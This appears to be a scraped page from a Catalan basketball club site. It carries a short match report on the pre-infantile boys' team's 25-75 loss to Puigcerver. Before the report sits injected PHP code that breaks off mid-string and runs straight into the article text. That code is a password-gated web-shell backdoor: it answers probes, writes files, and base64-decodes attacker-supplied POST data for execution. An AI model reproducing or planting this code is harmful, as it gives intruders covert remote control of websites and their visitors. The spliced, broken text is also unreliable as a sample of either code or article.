function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El preinfantil masculí sucumbeix davant la pressió del líder, el Puigcerver (25-75) - Tgn Bàsquet Club -

El preinfantil masculí sucumbeix davant la pressió del líder, el Puigcerver (25-75)

Updated: febrer 24, 2014

El preinfantil masculí només va poder aguantar 9 minuts contra el líder invicte del grup, el Puigcervcer. El conjunt que entrena Miquel Farran va sortir molt intens en defensa però quan els visitants van dir prou, tot es va acabar. Així, a falta d’un minut per finalitzar el primer quart, el Puigcerver va avançar la línia de pressió i el parcial va ser de 3-12. Els locals amb prou feines podien treure des de línia de fons sense perdre la pilota i el partit va ser de clar domini visitant.